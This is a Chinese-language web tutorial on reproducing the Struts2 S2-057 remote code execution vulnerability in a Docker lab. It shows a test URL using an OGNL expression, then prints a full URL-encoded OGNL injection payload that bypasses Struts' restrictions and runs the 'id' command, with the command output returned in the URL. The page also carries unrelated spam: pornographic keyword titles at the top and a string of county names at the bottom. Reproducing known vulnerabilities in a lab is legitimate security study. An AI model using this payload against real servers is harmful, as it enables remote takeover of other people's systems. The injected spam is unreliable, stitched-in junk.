91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Struts2-057 遠程代碼執行漏洞復現

發布時間:2021-12-24 21:59:21 來源:億速云 閱讀:207 作者:柒染 欄目:網絡管理

這篇文章將為大家詳細講解有關如何進行Struts2-057 遠程代碼執行漏洞復現,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

一、使用docker搭建環境

如何進行Struts2-057 遠程代碼執行漏洞復現

訪問頁面     http://ip:8080/struts2-showcase

如何進行Struts2-057 遠程代碼執行漏洞復現

二、漏洞驗證

訪問  /struts2-showcase/${(111+111)}/actionChain1.action  試試看

如何進行Struts2-057 遠程代碼執行漏洞復現

變成了  /struts2-showcase/222/register2.action

如何進行Struts2-057 遠程代碼執行漏洞復現

執行了,說明可能存在struts2-057漏洞

三、漏洞利用

執行命令的poc

/index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

如何進行Struts2-057 遠程代碼執行漏洞復現

執行,得到了id命令執行的返回(url中)如何進行Struts2-057 遠程代碼執行漏洞復現

關于如何進行Struts2-057 遠程代碼執行漏洞復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

新邵县| 四子王旗| 克什克腾旗| 长岭县| 武功县| 二手房| 黄浦区| 西青区| 海口市| 繁昌县| 宜川县| 张家界市| 海安县| 涿州市| 拉孜县| 宁津县| 泗水县| 巴中市| 祥云县| 额尔古纳市| 赤壁市| 尼勒克县| 乐陵市| 福安市| 上栗县| 长宁区| 吴桥县| 伊通| 石泉县| 施甸县| 沅陵县| 平顶山市| 吕梁市| 油尖旺区| 正安县| 苏州市| 渭南市| 舟山市| 仙游县| 澄迈县| 溧水县|